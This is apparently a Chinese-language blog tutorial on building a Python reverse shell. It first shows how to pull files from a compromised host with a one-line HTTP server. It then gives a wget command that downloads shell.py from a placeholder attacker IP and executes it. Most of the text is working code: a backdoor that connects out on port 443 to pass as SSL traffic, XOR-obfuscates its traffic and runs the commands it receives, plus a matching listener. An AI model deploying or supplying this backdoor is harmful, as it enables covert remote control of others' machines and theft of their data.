您的位置:首页 > 运维架构 > Shell

Python Security 之 反向Shell

2015-07-14 19:44 661 查看
首先我们先演示使用Python如何利用web服务器的功能,把文件从另一台主机传送过来。

我们假设你有一台傀儡主机,你现在想下载傀儡机上面的的文件。那么你就可以使用shell(或meterpreter)去访问这台傀儡机,你可以通过一行Python代码把傀儡机建立成为一个web服务器,然后下载傀儡机上面的文件.

创建一个python HTTP服务器可以直接使用python的内建函数”SimpleHTTPServer”来创建

你可以使用’-m’参数直接在命令行调用模块,创建的服务器默认是监听的8000端口,但是你可以指定端口,直接在’SimpleHTTPServer’后面跟一个端口参数

python -m SimpleHTTPServer 80
Serving HTTP on 0.0.0.0 80 ...


我们假设你没有防火墙去阻止你的连接,那么你是可以请求到这服务器的数据。你可以在任何目录里面去启动Python HTTP服务器,这样你就能够通过浏览器或者是远程客户端来访问这个目录。但是有些时候就会经常发现你根本没有权限在当前目录写入文件并且初始化这个脚本,但是你可以改变脚本执行的目录.

#使用-O参数,把文件保存在其他目录- /tmp/ 一般可写
wget -O /tmp/shell.py http://<attacker_ip>/shell.py 
#修改权限
chmod a+x /tmp/shell.py

# 使用file命令检查文件是否正确
file /tmp/shell.py

#执行脚本
/usr/bin/python /tmp/shell.py


现在让我看一个实际的后门代码。我们将会使用socket,subprocess和sys模块.

我非常的喜欢subprocess模块因为它允许你能储存STDOUT给一个变量,然后在脚本中的其他地方使用,然后新增一个传输层,通过443端口来传输文件,这个端口经常用在传输ssl的数据可以很容易的混淆数据

#!/usr/bin/python

import socket,subprocess,sys

RHOST = sys.argv[1]
RPORT = 443
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((RHOST, RPORT))

while True:
# 从socket中接收XOR编码的数据
data = s.recv(1024)

# XOR the data again with a '\x41' to get back to normal data
en_data = bytearray(data)
for i in range(len(en_data)):
en_data[i] ^=0x41

# 执行解码命令,subprocess模块能够通过PIPE STDOUT/STDERR/STDIN把值赋值给一个变量
comm = subprocess.Popen(str(en_data), shell=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE, stdin=subprocess.PIPE)
STDOUT, STDERR = comm.communicate()

# 输出编码后的数据并且发送给指定的主机RHOST
en_STDOUT = bytearray(STDOUT)
for i in range(len(en_STDOUT)):
en_STDOUT[i] ^=0x41
s.send(en_STDOUT)
s.close()


除了之前的使用socket创建一个连接之外,我们通过subprocess模块执行了一个命令。

subprocess模块非常的方便,它允许你通过STDOUT/STDERR命令直接把值赋值给一个变量,然后我们可以通过命令把输出的进行编码然后通过socket网络发送出去。

使用XOR的好处就是你能够很容易编码你要发送过去的数据,然后通过相同的密钥来解码返回的数据,最后解码后的数据可以以明文的形式去执行命令。

现在为了利用好这个后门,我们需要一个监听脚本并且解码后端传输过来的数据,让我们通过明文很清晰的看清楚返回的数据。

下面我们将要设计一个监听器。来获取反向shell的数据,并且能够对于输入/输出的进行解码/编码,为了能够在终端上面能够很清晰的看出来,所以需要使用XOR编码:

import socket

s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.bind(("0.0.0.0", 443))
s.listen(2)
print "Listening on port 443... "
(client, (ip, port)) = s.accept()
print " Received connection from : ", ip

while True:
command = raw_input('~$ ')
encode = bytearray(command)
for i in range(len(encode)):
encode[i] ^=0x41
client.send(encode)
en_data=client.recv(2048)
decode = bytearray(en_data)
for i in range(len(decode)):
decode[i] ^=0x41
print decode

client.close()
s.close()
内容来自用户分享和网络整理,不保证内容的准确性,如有侵权内容,可联系管理员处理 点击这里给我发消息
标签: